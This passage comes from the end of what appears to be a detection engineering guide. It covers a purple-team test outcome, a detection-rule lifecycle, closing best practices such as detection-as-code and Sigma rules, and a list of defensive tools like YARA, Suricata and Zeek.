  3. Alert generated in SIEM
  4. SOC analyst investigates within 5 minutes

Result:
  ✅ Detection triggered
  ⚠️ Alert buried in noise (20 other alerts)
  ❌ Analyst response time: 25 minutes

Improvement:
  - Increase alert severity
  - Add automated enrichment
  - Tune out low-value alerts

Detection Rule Lifecycle

[New Threat Identified]
        ↓
[Research & Hypothesis]
        ↓
[Rule Development]
        ↓
[Testing (Lab Environment)]
        ↓
[Peer Review]
        ↓
[Staging Deployment]
        ↓
[Production (Monitor Mode)]
        ↓
[Tuning Period (2 weeks)]
        ↓
[Production (Alert Mode)]
        ↓
[Continuous Monitoring]
        ↓
[Quarterly Review]
        ↓
[Update or Retire]

Conclusion

Detection engineering in 2026 requires a disciplined, engineering-focused approach to building and maintaining effective threat detection capabilities. Key takeaways:

Essential practices:

  • Adopt detection-as-code methodologies with version control
  • Implement platform-agnostic detection formats (Sigma)
  • Maintain comprehensive coverage across MITRE ATT&CK framework
  • Integrate multiple detection layers (signatures, behavior, correlation)
  • Continuously measure and improve detection effectiveness

Critical success factors:

  • Quality over quantity: 50 high-fidelity rules > 500 noisy rules
  • Context is everything: Enrich logs before detection
  • Automate ruthlessly: Testing, deployment, response
  • Purple team collaboration: Validate detection with realistic attacks
  • Metrics-driven improvement: Track MTTD, MTTR, false positive rates

Modern detection stack:

  • SIEM/Log aggregation (Splunk, Elastic, Sentinel, Wazuh)
  • Platform-agnostic rules (Sigma)
  • Endpoint detection (EDR/XDR)
  • Network detection (Suricata/Zeek)
  • Malware analysis (YARA)
  • Orchestration & automation (SOAR)

The threat landscape evolves constantly. Detection engineering must be a continuous process of learning, testing, validating, and improving. Build detections that are robust, maintainable, and effective against real-world adversaries.

Remember: The best detection is one that triggers on real threats, provides actionable context, and integrates seamlessly into your response workflow.


Additional Resources

Detection Engineering Platforms & Tools

Detection-as-Code Tools:

  • Sigma HQ - Generic signature format for SIEM
  • Sigma CLI - Sigma rule converter and validator
  • Uncoder.io - Online Sigma rule converter
  • YARA - Pattern matching for malware detection
  • YARA-CI - Continuous integration for YARA rules

Network Detection:

  • Suricata - High-performance IDS/IPS/NSM engine
  • Zeek - Network analysis framework
  • Snort - Network intrusion detection system
  • Arkime (formerly Moloch) - Large scale packet capture and search


This guide covers detection engineering fundamentals for building effective, scalable threat detection programs in modern security operations centers.